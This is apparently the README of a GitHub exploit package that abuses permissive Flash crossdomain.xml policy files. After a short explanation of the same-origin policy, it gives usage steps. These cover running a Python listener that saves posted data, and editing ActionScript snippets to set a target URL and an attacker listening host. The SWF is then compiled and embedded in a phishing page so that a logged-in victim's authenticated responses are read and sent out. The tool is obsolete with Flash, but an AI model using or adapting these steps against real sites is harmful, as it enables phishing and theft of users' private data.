Browsers, and browser plug-ins such as Flash Player, enforce a same-origin policy that stops content served from one origin from reading responses served by another. Site operators sometimes need to relax this policy for trusted partners. For Flash Player, Adobe provided cross-domain policy files, better known as crossdomain.xml: a file served from a site's root that lists the origins allowed to read that site's responses.
Over the Top
This exploit was developed to demonstrate how a cross-domain policy file misconfiguration can compromise sensitive data.
The attacker's phishing page embeds a malicious Flash (SWF) file. When a victim who is logged in to the target site opens the page, Flash Player fetches the target's crossdomain.xml before it lets the SWF read any response from that origin. If the policy is permissive (for example, allow-access-from domain="*"), Flash Player treats the attacker's origin as trusted: the SWF requests pages from the target with the victim's session cookies attached, reads the authenticated responses, and posts the data to the attacker's listening server. No script runs on the target site itself; the target simply answers requests it believes come from an allowed origin.
How-To
The following package has the necessary files to test this exploit in one’s environment:
https://github.com/NavidNaf/CrossDomain-XML-Exploit
The package targets websites with a misconfigured crossdomain.xml. It contains the following files:
webserver.py: a minimal HTTP server. Running it starts a listener on the given port:
python webserver.py [PORT NUMBER]
Use python3 instead of python on macOS/Linux. The server accepts POST requests and saves each posted body to a file named serverResponse.txt.
crossDomainExploit.as: ActionScript code that is compiled into a SWF and later embedded in an HTML file. Change the following portions:
public class crossDomainExploit extends Sprite {
........
var readFrom:String = "https://targetsite.com"; // target site: the URL whose data is read
Change this URL to your designated target, the URL the data is retrieved from.
private function eventHandler(event:Event):void {
var sendTo:String = "http://listeningsite.com"; // listener: where the SWF posts the data
Change this URL to the webserver you created, or any other listening site you have deployed. This is where the SWF posts the data.
How to render the SWF?
- Download Apache Royale (https://royale.apache.org/)
- Compile the .as file with mxmlc:
mxmlc ~/path/to/your/file/crossDomainExploit.as
A phishing page embedding the SWF also has to be created, so that when the page loads, the SWF retrieves data from the target site.
Extras Directory
- crossdomain.xml: sample of a vulnerable cross-domain policy file.
- index.html: sample phishing page with the SWF embedded.
Dependencies
- SWF is obsolete: Adobe ended support for Flash Player at the end of 2020 and current browsers no longer run SWF content, so the exploit only works on legacy platforms.
- The victim must be logged in to the target site when opening the phishing URL; the exploit relies on the browser attaching the victim's session cookies to the requests the SWF makes, so without a live session only unauthenticated content is retrieved.